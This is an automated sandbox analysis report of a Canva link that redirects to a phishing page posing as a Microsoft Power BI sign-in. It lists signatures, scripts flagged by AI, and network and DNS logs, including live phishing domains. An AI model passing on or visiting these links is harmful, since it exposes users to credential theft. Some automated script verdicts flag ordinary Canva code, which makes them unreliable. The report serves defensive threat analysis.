Edit tour

Windows Analysis Report
https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document

Overview

General Information

Sample URL:	https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document
Analysis ID:	1574985
Infos:

Detection

HTMLPhisher

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish44

AI detected suspicious Javascript

Form action URLs do not match main URL

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML title does not match URL

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1904,i,9976407154716733636,9960061309519468343,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_271	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: dropped/chromecache_271, type: DROPPED

AI detected suspicious Javascript

Source: 0.2.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://www.canva.com/link?target=https%3A%2F%2Fgu... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and interaction with suspicious domains. While some of the behavior may be related to legitimate functionality, the overall risk profile is concerning and requires further investigation.
Source: 1.6..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://static.canva.com/web/e15e945e8b4aba4c.runt... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the behaviors may be related to legitimate functionality like analytics or module loading, the overall level of risk is high due to the presence of multiple malicious indicators. Further investigation is recommended to determine the true intent and purpose of this script.
Source: 0.22.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://gu3.watetiona.com/YEcft/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser developer tools, and redirecting the user to an external domain. While the intent behind the script is not entirely clear, the combination of these behaviors suggests a high likelihood of malicious or suspicious activity.
Source: 0.21.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://gu3.watetiona.com/YEcft/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: 0.23.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://gu3.watetiona.com/YEcft/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script uses the `turnstile.render()` function, which can execute arbitrary code, and it sends user data to an unknown domain. Additionally, the script redirects the user to the 'powerbi.microsoft.com' domain, which is inconsistent with the apparent purpose of the script. These behaviors indicate a high likelihood of malicious intent, warranting a high-risk score.
Source: 1.13..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://static.canva.com/web/71f6dba82cb18a30.js... This JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `__webpack_require__` to execute remote code and the creation of a global object `self._fe4d99ebe0d2d259646a80d250150d47` are particularly concerning. Additionally, the script appears to be interacting with IndexedDB, which could be used for data storage and exfiltration. Overall, the combination of these behaviors suggests this script is likely malicious and should be further investigated.

Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/

HTTP Parser: Form action: https://login.microsoftonline.com/organizations/oauth2/v2.0/authorize?client_id=10fa57ef-4895-4ab2-872c-8c3613d4f7fb&redirect_uri=https%3A%2F%2Fwww.microsoft.com%2Fcascadeauth%2Faccount%2Fsignin-oidc&response_type=code&prompt=none&scope=openid%20profile%20offline_access&code_challenge=MZnJCJZii27ecNB1gjjXxulOJdUVFl6W6kqL61sUAh4&code_challenge_method=S256&response_mode=form_post&nonce=638697249980504894.NTY5ODJmN2MtMGZjNS00YWIyLTlhNzgtYTBkNGY3ODRhNWQwMGM3YTQ1NjUtZWExYi00ZDgzLTljNTctMTgwYjU2MTg3YTc2&client_info=1&x-client-brkrver=IDWeb.3.2.0.0&msafed=0&claims=%7B%22compact%22%3A%7B%22name%22%3A%7B%22essential%22%3Atrue%7D%7D%7D&state=CfDJ8P_pstto1o1NgBRsh8q_Vvhm642ho9maFANHURo9u9-svsxYA_etkMI3hACn7WOYk3-LpBy3pAl3GeR7UyKOKtJBIcig1GGtDNRdakPJDcFAx3Wq2B-ZSUB9d6ZCx8bqCyhtKOdVG-6ysqsHLz80IF_OgDkckwl4jdmkVwTW6K_vMy6lYbcmcDmIAfdHl_3keWVrHLTwGmnh4ohpn7cI3Q_-4Xps7ovYyUKOTJTpk0JeqF47pYtilaTQGHFLYBWEXQv5yaNM9r8n0jKnWF0tdBKusqilNf9qpLMKJyYyTS5PMKaXqvxf6E6PVSQ9e_dOtKFI2EEVWBmQk6wIcwUY99wsxyUuljWO6OSYgc2od2dgDtqgukdh41-ZeH9GqVovBQZrhyG-FYdB_9U_p9NjfMY3pxoGeQQU-N4MzX0LDV-Jsv10CC39MqIswp1EjG0dhrdo1S9vmosFjfflIpFLfYklYarHwQLa71E2YCSZph8Y6ix7VRdw-7HP9Eec71zJdOLTY86XDHe3rwA_7ko7ZcE&x-client-SKU=ID_NET6_0&x-client-ver=8.1.0.0&sso_reload=true microsoft microsoftonline

Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/

HTTP Parser: Number of links: 0

Source: https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document

HTTP Parser: Base64 decoded: 1734128130.000000

Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/

HTTP Parser: Title: Redirecting does not match URL

Source: https://gu3.watetiona.com/YEcft/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No favicon

Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No <meta name="author".. found
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No <meta name="author".. found

Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No <meta name="copyright".. found
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49805 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: global traffic	DNS traffic detected: DNS query: www.canva.com
Source: global traffic	DNS traffic detected: DNS query: static.canva.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: o13855.ingest.sentry.io
Source: global traffic	DNS traffic detected: DNS query: static.cloudflareinsights.com
Source: global traffic	DNS traffic detected: DNS query: gu3.watetiona.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: 5igcqa810yp2rcmgvohmmeoewkmyvjbw4uvf8uaagn99durqrlobvm.birsbunh.ru
Source: global traffic	DNS traffic detected: DNS query: cdn.botframework.com
Source: global traffic	DNS traffic detected: DNS query: play.vidyard.com
Source: global traffic	DNS traffic detected: DNS query: publisher.liveperson.net
Source: global traffic	DNS traffic detected: DNS query: lpcdn.lpsnmedia.net
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: assets.adobedtm.com
Source: global traffic	DNS traffic detected: DNS query: login.microsoftonline.com
Source: global traffic	DNS traffic detected: DNS query: lptag.liveperson.net
Source: global traffic	DNS traffic detected: DNS query: dpm.demdex.net
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: mscom.demdex.net
Source: global traffic	DNS traffic detected: DNS query: msftenterprise.sc.omtrdc.net
Source: global traffic	DNS traffic detected: DNS query: ib.adnxs.com
Source: global traffic	DNS traffic detected: DNS query: idsync.rlcdn.com
Source: global traffic	DNS traffic detected: DNS query: accdn.lpsnmedia.net
Source: global traffic	DNS traffic detected: DNS query: static-assets.fs.liveperson.com
Source: global traffic	DNS traffic detected: DNS query: cm.g.doubleclick.net
Source: global traffic	DNS traffic detected: DNS query: rtd.tubemogul.com
Source: global traffic	DNS traffic detected: DNS query: idpix.media6degrees.com
Source: global traffic	DNS traffic detected: DNS query: analytics.twitter.com
Source: global traffic	DNS traffic detected: DNS query: rtd-tm.everesttech.net
Source: global traffic	DNS traffic detected: DNS query: match.adsrvr.org
Source: global traffic	DNS traffic detected: DNS query: cms.quantserve.com
Source: global traffic	DNS traffic detected: DNS query: cm.everesttech.net
Source: global traffic	DNS traffic detected: DNS query: servedby.flashtalking.com
Source: global traffic	DNS traffic detected: DNS query: a.tribalfusion.com
Source: global traffic	DNS traffic detected: DNS query: cms.analytics.yahoo.com
Source: global traffic	DNS traffic detected: DNS query: s.tribalfusion.com
Source: global traffic	DNS traffic detected: DNS query: px.owneriq.net
Source: global traffic	DNS traffic detected: DNS query: va.v.liveperson.net
Source: global traffic	DNS traffic detected: DNS query: jadserve.postrelease.com
Source: global traffic	DNS traffic detected: DNS query: ups.analytics.yahoo.com
Source: global traffic	DNS traffic detected: DNS query: ds.reson8.com
Source: global traffic	DNS traffic detected: DNS query: bttrack.com
Source: global traffic	DNS traffic detected: DNS query: dmpsync.3lift.com
Source: global traffic	DNS traffic detected: DNS query: ag.innovid.com
Source: global traffic	DNS traffic detected: DNS query: rtb.adentifi.com
Source: global traffic	DNS traffic detected: DNS query: sync.crwdcntrl.net
Source: global traffic	DNS traffic detected: DNS query: sync-tm.everesttech.net
Source: global traffic	DNS traffic detected: DNS query: pixel.rubiconproject.com
Source: global traffic	DNS traffic detected: DNS query: www.clarity.ms
Source: global traffic	DNS traffic detected: DNS query: dsum-sec.casalemedia.com
Source: global traffic	DNS traffic detected: DNS query: us-u.openx.net
Source: global traffic	DNS traffic detected: DNS query: image2.pubmatic.com
Source: global traffic	DNS traffic detected: DNS query: sync.search.spotxchange.com
Source: global traffic	DNS traffic detected: DNS query: trc.taboola.com
Source: global traffic	DNS traffic detected: DNS query: z.clarity.ms
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: sync.srv.stackadapt.com
Source: global traffic	DNS traffic detected: DNS query: munchkin.marketo.net

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 50194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50190
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 50227 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50199
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50198
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50146
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
